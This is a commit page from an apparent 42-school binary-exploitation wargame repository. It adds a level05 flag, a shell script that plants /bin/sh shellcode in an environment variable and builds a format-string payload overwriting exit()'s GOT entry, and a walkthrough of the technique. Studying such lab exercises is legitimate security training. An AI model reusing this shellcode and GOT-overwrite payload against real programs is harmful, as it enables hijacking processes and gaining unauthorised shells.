starnakin/42_override
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

level05: done (exploit modified to a better shellcode)

Browse Source 
level07: walkthrough done
level08: done
level09: done
This commit is contained in:
0x35c
2025-05-15 14:00:44 +02:00
parent 4a88b55e23
commit a3ea938eb1
12 changed files with 74 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
level05/flag Normal file
View File

@ -0,0 +1 @@
h4GtNnaMs2kZFN92ymTr2DcJHAzMfzLW25Ep59mq

23
level05/ressources/exploit.sh
View File

@ -1,6 +1,4 @@
#!/bin/sh
export SHELLCODE="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"
export SHELLCODE=$(python -c 'print "\x90"*1000+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"')
printf '
#include <stdio.h>
@ -8,25 +6,24 @@ printf '
int main(void)
{
printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
return 0;
printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
return 0;
}' > /tmp/env.c
gcc -m32 /tmp/env.c -o /tmp/a.out
/tmp/a.out > /tmp/shellcode_addr
printf '
with open("/tmp/shellcode_addr") as f: shellcode_addr = f.read()
exit_addr_low = "\\x08\\x04\\x97\\xe0"[::-1]
exit_addr_high = "\\x08\\x04\\x97\\xe2"[::-1]
shellcode_low = int(shellcode_addr[4:], 16) - 8
shellcode_high = int(shellcode_addr[:4], 16) - shellcode_low - 8
text = open("/tmp/shellcode_addr").read()
payload = "%%{0}d%%10$hn%%{1}d%%11$hn".format(shellcode_low, shellcode_high)
exploit = exit_addr_low + exit_addr_high + payload
shell_code_low = int(text[4:],16)
shell_code_high = int(text[:4],16)
exit_addr_high = "\\x08\\x04\\x97\\xe2"
exit_addr_low = "\\x08\\x04\\x97\\xe0"
print(exit_addr_low[::-1] + exit_addr_high[::-1] + ("%%" + str(shell_code_low - 8) + "p") + "%%10$hn" + ("%%" + str(shell_code_high - shell_code_low) + "p") + "%%11$hn")
print(exploit)
' > /tmp/exploit.py
(python /tmp/exploit.py; cat) | ./level05

14
level05/walkthrough Normal file
View File

@ -0,0 +1,14 @@
# Level05
Using ghidra, we can decompile the code and see that it fills a buffer of 100 bytes using `fgets()`.
It will then `xor` every char from 65 to 90 in the ascii table (the upper case alphabet).
Finally, this string will be passed as the string format to `printf()` and we can exploit this by overwriting the GOT address of the end `exit()`.
First, we need to find where the buffer is printing on the stack. We can simply write `"AAAA"`, followed by a bunch of `%x` to dump the stack and find where it is. Here, it's in the 10th position.
Second, we need to get the GOT address of `exit()`. Using gdb, we get an address of `0x80497e0`.
Then, we will write our shellcode injection to an environment variable so we can print its address instead of `exit()`.
We can print this address with gdb (or using a C program, which is what we did for automation purposes).
Once we have all that, we can exploit `printf()` to put the address of our shellcode at the GOT address of `exit()`. For this, we need to split the padding for the address in 2 parts because it would take foreverto print all these bytes of padding.
We simply separate the shellcode address in an upper part (4 bytes) and a lower part (4 bytes).
For the exit address, we're gonna write 2 bytes by 2 bytes so we need to write the first part of the address to `0x80497e0` and the second part to `0x80497e0 + 2`, or `0x80497e2`.
For this one, you can copy paste the bash script in `./ressources/exploit.sh`.